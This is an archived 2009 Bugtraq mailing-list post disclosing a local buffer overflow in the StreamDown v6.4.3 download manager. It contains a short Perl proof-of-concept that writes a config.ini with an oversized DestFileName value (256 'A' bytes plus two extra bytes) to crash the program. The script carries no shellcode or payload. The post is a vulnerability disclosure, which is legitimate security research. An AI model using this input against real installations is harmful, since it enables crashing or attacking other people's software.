lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090202133652.12939.qmail@securityfocus.com>
Date: 2 Feb 2009 13:36:52 -0000
From: todor.donev@...il.com
To: bugtraq@...urityfocus.com
Subject: StreamDown v6.4.3 Local Buffer Overflow PoC

#!perl
#
# StreamDown v6.4.3 Local Buffer Overflow Exploit (0day)
# -------------------------------------------------------
# Research & Exploit  [Todor Donev :: todor.donev@...il.com]
# -------------------------------------------------------
# Shareware software for downloading and stream ripping
#
# Tested on Windows XP SP3
# Proof Of Concept
# 
# Best regards and be safe,
# Todor Donev
#

$overflow = "\x41" x 256;
$x = "\x05\x01";
open(my $config, "> config.ini");
print $config "[SnifferPos]\n".
              "X=300\n".
              "Y=5\n".
              "state=0\n".
              "[TimeOut]\n".
              "Default=30\n".
              "[Proxy]\n".
              "server=\n".
              "port=\n".
              "enable=0\n".
              "[DestPath]\n".
              "Default=c:MyDownloads\n".
              "[Down]\n".
              "Count=1\n".
              "[0]\n".
              "URL=\n".
              "DestFileName=c:MyDownloadshttp".
               $overflow.$x."\n".
              "State=5\n".
              "TotalSize=0\n";
close $config;

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ